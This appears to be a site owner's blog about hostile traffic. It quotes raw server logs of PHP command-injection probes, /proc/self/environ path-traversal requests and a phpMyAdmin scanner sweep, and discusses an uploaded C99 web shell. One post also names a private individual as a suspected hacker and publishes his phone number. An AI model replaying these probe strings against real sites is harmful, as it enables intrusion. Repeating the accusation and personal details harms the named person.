58.63.241.209 knocking on the door.

I see a few visitors who are looking for weaknesses on most of my domains daily.
Usually a few lines like “admin/banner_manager.php/login.php” during a few seconds.
This one was a bit more “intense” than usual, +1100 lines in the log and it lasted for +13 minutes.
Coming from the IP 58.63.241.209 (China), looking for weaknesses to exploit, “proc/self/environ%00”.

I see Joomla clearly in there, but whether the rest of the hits are all related to Joomla, I don’t know.
I suspect this is an intended “box opener” looking for weaknesses in various possible installs, but I have very limited knowledge of this.

58.63.241.209 is known from before, see e.g. http://www.dshield.org/ipdetails.html?ip=58.63.241.209

The first few lines, see the attached .txt-file (.txt is now allowed?) .odt-file if you are interested in the rest.

[29/Dec/2011:04:06:48 -0500] "GET /pics/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:48 -0500] "GET /images/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:49 -0500] "GET /album/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:52 -0500] "GET /img/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:52 -0500] "GET /albums/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:52 -0500] "GET /photo/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:53 -0500] "GET /photos/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:53 -0500] "GET /photoalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:53 -0500] "GET /photoalbums/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:53 -0500] "GET /pic/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:54 -0500] "GET /catalog/shopping_cart.php?_ID=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:54 -0500] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:55 -0500] "GET /include/new-visitor.inc.php?lvc_include_dir=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:55 -0500] "GET /_functions.php?prefix=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:56 -0500] "GET /cpcommerce/_functions.php?prefix=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:57 -0500] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:57 -0500] "GET /modules/agendax/addevent.inc.php?agendax_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:57 -0500] "GET /ashnews.php?pathtoashnews=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:57 -0500] "GET /eblog/blog.inc.php?xoopsConfig[xoops_url]=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:58 -0500] "GET /pm/lib.inc.php?pm_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:58 -0500] "GET /b2-tools/gm-2-b2.php?b2inc=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:58 -0500] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:59 -0500] "GET /modules/agendax/addevent.inc.php?agendax_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:59 -0500] "GET /includes/include_once.php?include_file=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:07:00 -0500] "GET /e107/e107_handlers/secure_img_render.php?p=../../../../../../../proc/self/environ%00

58.0.0.0/7 was already in .htaccess.

Advertisements
Posted in hackers. Comments Off on 58.63.241.209 knocking on the door.

Gootkit auto-rooter scanner – hello

First time I have seen something identify as “Gootkit auto-rooter scanner”.
As a sidenote, this is also an example of why I prefer to block afrinic.
Too much rotten stuff coming from that space.

All these came via 41.129.63.65:

 [21/Sep/2011:09:28:13 -0400] "GET / HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:14 -0400] "GET /phpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:14 -0400] "GET /phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:14 -0400] "GET /PHPMYADMIN/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:14 -0400] "GET /db/phpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:14 -0400] "GET /db/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:15 -0400] "GET /pma/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:15 -0400] "GET /myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:15 -0400] "GET /admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:15 -0400] "GET /mysql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:15 -0400] "GET / HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:16 -0400] "GET /3rdparty/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:16 -0400] "GET /3rdparty/admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:16 -0400] "GET /3rdparty/dbadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:16 -0400] "GET /3rdparty/myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:16 -0400] "GET /3rdparty/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:16 -0400] "GET /3rdparty/pma/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:17 -0400] "GET /3rdparty/pma2005/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:17 -0400] "GET /3rdparty/setup.php HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:17 -0400] "GET /~/admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:17 -0400] "GET /admin/db/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:17 -0400] "GET /administrator/admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:18 -0400] "GET /administrator/db/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:18 -0400] "GET /administrator/phpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:18 -0400] "GET /administrator/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:18 -0400] "GET /administrator/pma/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:18 -0400] "GET /administrator/PMA/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:19 -0400] "GET /administrator/web/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:19 -0400] "GET /admin/phpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:19 -0400] "GET /admin/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:19 -0400] "GET /admin/pma/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:19 -0400] "GET /admin/pMA/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:19 -0400] "GET /admin/sqladmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:20 -0400] "GET /admin/sysadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:20 -0400] "GET /admin/web/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:20 -0400] "GET /bbs/data/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:20 -0400] "GET /cpadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:20 -0400] "GET /cpadmindb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:21 -0400] "GET /cpanelmysql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:21 -0400] "GET /cpanelphpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:21 -0400] "GET /cpanelsql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:21 -0400] "GET /cpdbadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:21 -0400] "GET /cpphpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:21 -0400] "GET /database/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:22 -0400] "GET /database/database/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:22 -0400] "GET /database/phpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:22 -0400] "GET /database/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:22 -0400] "GET /database/phpmyadmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:22 -0400] "GET /database/phpMyAdmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:23 -0400] "GET /db/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:23 -0400] "GET /dbadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:23 -0400] "GET /db/db-admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:23 -0400] "GET /db/dbadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:23 -0400] "GET /db/dbweb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:23 -0400] "GET /db/myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:24 -0400] "GET /db/phpmyadmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:24 -0400] "GET /db/phpMyAdmin-2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:24 -0400] "GET /db/phpMyAdmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:24 -0400] "GET /db/webadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:24 -0400] "GET /db/webdb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:25 -0400] "GET /db/websql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:25 -0400] "GET /~/myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:25 -0400] "GET /MyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:25 -0400] "GET /mysql-admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:25 -0400] "GET /mysql/admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:26 -0400] "GET /mysqladmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:26 -0400] "GET /mysqladminconfig/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:26 -0400] "GET /mysql/db/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:26 -0400] "GET /mysql/dbadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:26 -0400] "GET /mysqlmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:26 -0400] "GET /mysql/mysqlmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:27 -0400] "GET /mysql/pma/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:27 -0400] "GET /mysql/pMA/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:27 -0400] "GET /mysql/sqlmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:27 -0400] "GET /mysql/web/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:27 -0400] "GET /~/phpadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:28 -0400] "GET /phpadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:28 -0400] "GET /~/phpmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:28 -0400] "GET /phpmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:28 -0400] "GET /phpmy/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:28 -0400] "GET /phpmya/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:28 -0400] "GET /php-my-admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:29 -0400] "GET /php-myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:29 -0400] "GET /phpmy-admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:29 -0400] "GET /phpmyadmin1/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:29 -0400] "GET /phpmyadmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:29 -0400] "GET /phpMyAdmin-2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:30 -0400] "GET /phpMyAdmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:30 -0400] "GET /phppma/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:30 -0400] "GET /p/m/a/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:30 -0400] "GET /PMA/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:30 -0400] "GET /pma2005/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:30 -0400] "GET /PMA2005/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:31 -0400] "GET /program/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:31 -0400] "GET /qql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:31 -0400] "GET /roundcube/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:31 -0400] "GET /sl2/data/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:31 -0400] "GET /SQL/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:32 -0400] "GET /sqladmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:32 -0400] "GET /sqlmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:32 -0400] "GET /sql/myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:32 -0400] "GET /sql/phpmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:32 -0400] "GET /sql/php-myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:33 -0400] "GET /sql/phpmy-admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:33 -0400] "GET /sql/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:33 -0400] "GET /sql/phpmyadmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:33 -0400] "GET /sql/phpMyAdmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:33 -0400] "GET /sql/sql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:33 -0400] "GET /sql/sql-admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:34 -0400] "GET /sql/sqladmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:34 -0400] "GET /sql/sqlweb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:34 -0400] "GET /sqlweb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:34 -0400] "GET /sql/webadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:34 -0400] "GET /sql/webdb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:35 -0400] "GET /sql/websql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:35 -0400] "GET /typo3/phpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:35 -0400] "GET /web/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:35 -0400] "GET /webadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:35 -0400] "GET /webdb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:35 -0400] "GET /web/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:36 -0400] "GET /websql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
Posted in hackers. Comments Off on Gootkit auto-rooter scanner – hello

Silent Noise hacked

And I don’t have much clue how it happened.
A shell (GNY.Shell – findex.php) and a proxy (proxy.php) was uploaded, but where the weakness was (is?) is not known to me.
I would not be very much surprised if this turned out to be a part of the christmas hacking at evilzone.org.
In that aspect it fits in with the previous posting here.

If you can read Norwegian, there is also something here:
hxxp://skriblerier. adesign. no/index.php?q=node/63 (not alive anymore, shut down in 2014)

User Agent:
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nb-NO; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)

I think I got mail set up right.
And the redirect to this one on wordpress.com.

Update some hours later

The shell that was uploaded:
http://www.virustotal.com/analisis/723df5a4fa11cf36f3998152707008a7c6e3978f2b82556f406b6874f39b925e-1261683007

Goes by various names: Backdoor.PHP.C99Shell.y, probably a variant of PHP/Rst.S, PHP.ShellBot.K, Trojan.Script.212277.

“Score” at virustotal is 16/41.

Update December 25, 2009

A few other interesting IPs:
62.16.238.118 <—–  “Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html”?
Umm, don’t think so. More likely a pimplefaced teenager from Trondheim in Norway. Seen on at least three of my domains.
Also using the UA string “Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5”.

88.91.112.99 <—– Telenor in Norway. I have seen one very close one earlier, 88.91.112.130 (and 84.208.191.113, perhaps 85.165.173.203 too).
Now, how many Telenor users are skiddies? Quite a lot probably. But I’ll bet my money on that this is the one who used 88.91.112.130 to log in to h4cky0u as []Volume earlier this year. Now admin at evilzone.org and nationalhacker.org. If anyone is interested, they can check out how the Christmas hacking over at evilzone.org is going. I have not registered to have a look. But I trust that Andreas Ringstad Hansen, phone 470 42 073, is doing a good job in herding his “crew”.
Also admin at the former 1nj3ct.org. Which went down when he got a bit nervous after a little slap on the wrist from the police. nordicws.org is another one of his “masterpieces”. Oh, he changed that one. I can throw up a screenshot or two. Or five. When I figure out how to do it here on wordpress.com.
I’ll give it a try, it is supposed to be below this text:

screenshot from nordicws.org

68.68.107.40 <—-  Right now I have forgotten why this one is interesting.

195.47.247.176. Hits in logs at atleast two of my domains. 195.47.247.176 is also hosting nordicws.org.
Lots of coincidences here.

Posted in hackers. Comments Off on Silent Noise hacked

Not sure what to do with teenage hackers…

Not sure what to do with teenage hackers/skiddies or whatever I should call them.

I’ll figure it out someday.
Maybe.

Maybe on Monday. I’m already slowly getting in a bad mood.
Yes, maybe Monday.

Posted in General, hackers. Comments Off on Not sure what to do with teenage hackers…